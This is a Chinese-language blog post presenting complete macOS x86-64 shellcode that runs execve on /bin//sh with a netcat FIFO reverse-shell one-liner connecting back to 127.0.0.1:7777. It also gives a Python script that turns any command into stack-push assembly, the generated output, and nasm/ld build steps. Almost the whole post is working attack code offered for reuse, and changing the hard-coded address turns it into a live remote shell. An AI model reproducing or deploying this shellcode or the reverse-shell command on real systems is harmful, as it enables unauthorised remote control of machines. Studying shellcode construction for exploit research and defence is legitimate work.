【shellcode】macOS 利用nc反弹shell的shellcode
2022-06-30 10:51:27
shellcode 功能：通过 macOS 的 BSD 类系统调用号（rax = 0x2000000 | 59，即 execve）发起系统调用，实际执行的是 execve("/bin//sh", ["/bin//sh", "-c", CMD, NULL], NULL)，其中 CMD 是我们需要执行的命令。shellcode 中我先 push 一个 0 作为字符串结尾的 NUL，再把 CMD 按 8 字节一组从尾到头 push 到栈上，最后用 rsp 取得它的地址。注意：CMD 里的回连地址 127.0.0.1:7777 是硬编码的，监听端要先起好；修改命令后必须用下面的脚本重新生成那一组 mov/push 指令。由于一开始汇编时遇到注释相关的问题，我就把注释删了，用 lldb 或 gdb 调试再结合参考文章看一下就比较清楚了。
最新版本放在这里:
- https://gist.github.com/thinkycx/4cd3c90804b7e2366d49bf06d0cbb385
- https://gist.github.com/thinkycx/66b9b1d02a514a4b72daef6569ee6c71
生成“把字符串 push 到栈上”那段汇编的 Python 脚本如下：
#!/usr/bin/python
# date: 2018-12-11
# author: thinkycx
# description: return asm shellcode : push string into stack and esp points to it!
# usage:
# change payload and run it.
import math
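def pushstr(string='/home/orw/flag', length=8):
    """Emit NASM that pushes *string* onto the stack so that rsp points at it.

    The text is split, from its end, into chunks of at most *length* bytes;
    each chunk becomes ``mov rcx, <imm>`` / ``push rcx``.  Chunks are taken
    from the reversed string, so the LAST chunk of the original text is pushed
    first and the text reads forwards in memory once the little-endian pushes
    are done.  The first emitted chunk is the short remainder
    (``len(string) % length`` bytes), so its immediate is zero-padded and
    doubles as the NUL terminator -- unless ``len(string)`` is an exact
    multiple of *length*, in which case the caller must push a zero qword
    first (the shellcode below does this with ``push rdx``).

    Args:
        string: text to place on the stack; every character is emitted as one
            byte (ASCII assumed).
        length: bytes per push; 8 matches a 64-bit ``push rcx``.

    Returns:
        The generated assembly as a str.  It is also printed, preceded by a
        ``pushasm:`` banner, so the script can be pasted from the console.

    Raises:
        ValueError: if *length* is not a positive number of bytes.

    Works unchanged on Python 2 and 3 (``print(x)`` with one argument and
    ``%02x`` hex instead of the Python-2-only ``str.encode('hex')``).
    """
    if length <= 0:
        raise ValueError('length must be a positive number of bytes')
    print('pushasm: ' + string)
    reversed_text = string[::-1]
    total = len(reversed_text)
    # ceil(total / length) without floats; 0 for an empty string.
    chunk_count = -(-total // length)
    chunks = []
    if chunk_count:
        # Only the first chunk may be short (1..length bytes); the rest are full.
        head = total - (chunk_count - 1) * length
        chunks.append(reversed_text[:head])
        chunks.extend(reversed_text[pos:pos + length]
                      for pos in range(head, total, length))
    lines = []
    for chunk in chunks:
        # Big-endian hex of the reversed chunk is exactly the little-endian
        # memory order of the original bytes after the push.
        imm = ''.join('%02x' % ord(ch) for ch in chunk)
        lines.append('mov rcx, 0x%s\npush rcx\n' % imm)
    asm = ''.join(lines)
    print(asm)
    return asm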
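# Command the shellcode runs via `/bin//sh -c`.  It recreates a FIFO at /tmp/f
# and wires an interactive shell to nc, which connects BACK to the hard-coded
# listener 127.0.0.1:7777 -- so a listener (e.g. `nc -l 7777`) must already be
# running there, and the FIFO is left behind afterwards.  The mov/push block in
# the shellcode below embeds this exact text; any edit here requires pasting the
# regenerated output of this script into that block.
payload = 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 127.0.0.1 7777 > /tmp/f'

if __name__ == '__main__':
    # Print the assembly to paste into the shellcode; guarded so importing
    # this module for pushstr() alone produces no output.
    pushstr(payload)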
'''
Output:
pushasm: rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 127.0.0.1 7777 > /tmp/f
mov rcx, 0x662f706d74
push rcx
mov rcx, 0x2f203e2037373737
push rcx
mov rcx, 0x20312e302e302e37
push rcx
mov rcx, 0x323120636e7c3126
push rcx
mov rcx, 0x3e3220692d206873
push rcx
mov rcx, 0x2f6e69622f7c662f
push rcx
mov rcx, 0x706d742f20746163
push rcx
mov rcx, 0x3b662f706d742f20
push rcx
mov rcx, 0x6f6669666b6d3b66
push rcx
mov rcx, 0x2f706d742f206d72
push rcx
'''
shellcode:
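; date: 2018-12-11
; author: thinkycx
; description:
;   reverse /bin/sh by nc, reference: https://modexp.wordpress.com/2017/01/21/shellcode-osx/
;   Builds argv = { "/bin//sh", "-c", CMD, NULL } on the stack and calls
;   execve("/bin//sh", argv, NULL) through the macOS BSD syscall class
;   (rax = 0x2000000 | 59).  CMD is the nc one-liner emitted by pushstr()
;   above; it connects back to the hard-coded 127.0.0.1:7777, so a listener
;   must already be running and the mov/push block below has to be
;   regenerated whenever the command changes.
;   NOTE(review): this is NOT NUL-free -- immediates such as 0x2, 0x632d and
;   0x662f706d74 assemble with zero bytes.  Fine for a standalone Mach-O or a
;   delivery path that carries a length; unsuitable where the payload is
;   copied as a C string.
; usage:
; nasm -f macho64 macOS-reverse-shellcode.asm
; ld -macosx_version_min 10.7.0 -o macOS-reverse-shellcode macOS-reverse-shellcode.o
BITS 64
global start
section .text
start:
    ; rax = execve in the BSD class: 2 ror 40 == 2 << 24 == 0x2000000, then | 59.
    ; (The original `xor rax, rax` before the mov and the `mov rcx, rax` after
    ; it were dead -- both values were overwritten before use -- and are gone.)
    mov rax, 0x2
    ror rax, 0x28
    or rax, 59
    ; rdx = 0: pushed as the terminator for every string below and, left
    ; untouched until the syscall, passed as envp = NULL.
    xor rdx, rdx
    ; rdi = &"/bin//sh\0"  (the doubled slash pads the path to exactly 8 bytes)
    mov rbx, 0x68732f2f6e69622f
    push rdx
    push rbx
    push rsp
    pop rdi
    ; rbx = &"-c\0"  (0x632d already has zero high bytes; the push rdx is padding)
    push rdx
    mov rbx, 0x632d
    push rdx
    push rbx
    push rsp
    pop rbx
    ; rcx = &CMD: terminator first, then the command from its tail to its head,
    ; exactly as printed by pushstr(payload) (first chunk is the 5-byte "tmp/f").
    push rdx
    mov rcx, 0x662f706d74
    push rcx
    mov rcx, 0x2f203e2037373737
    push rcx
    mov rcx, 0x20312e302e302e37
    push rcx
    mov rcx, 0x323120636e7c3126
    push rcx
    mov rcx, 0x3e3220692d206873
    push rcx
    mov rcx, 0x2f6e69622f7c662f
    push rcx
    mov rcx, 0x706d742f20746163
    push rcx
    mov rcx, 0x3b662f706d742f20
    push rcx
    mov rcx, 0x6f6669666b6d3b66
    push rcx
    mov rcx, 0x2f706d742f206d72
    push rcx
    push rsp
    pop rcx
    ; rsi = argv: push NULL, CMD, "-c", "/bin//sh" so argv[0] ends up at rsp.
    push rdx
    push rcx
    push rbx
    push rdi
    push rsp
    pop rsi
    ; execve(rdi = path, rsi = argv, rdx = NULL)
    syscall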